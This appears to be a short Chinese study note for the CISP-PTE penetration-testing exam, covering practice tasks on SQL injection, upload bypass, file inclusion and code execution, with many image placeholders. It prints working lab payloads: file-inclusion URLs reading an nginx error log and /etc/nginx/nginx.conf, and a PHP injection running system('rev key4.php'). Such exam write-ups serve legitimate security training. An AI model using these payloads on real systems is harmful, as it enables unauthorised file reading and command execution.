body="CISP-PTE 认证考试"

Untitled

基础题目一:SQL注入

Untitled

基础题目二:文件上传突破

Untitled

Untitled

基础题目三:文件包含

Untitled

<http://150.158.27.164:1083/start/index.php?page=hello>

<http://150.158.27.164:1083/start/index.php?page=/var/log/nginx/default.error.log>

<http://150.158.27.164:1083/start/index.php?page=/etc/nginx/nginx.conf>

日志报错文件包含。

Untitled

Untitled

基础题目四:代码执行漏洞

Untitled

解题代码:

http://150.158.27.164:1084/start/vul.php?a=${system('rev key4.php')}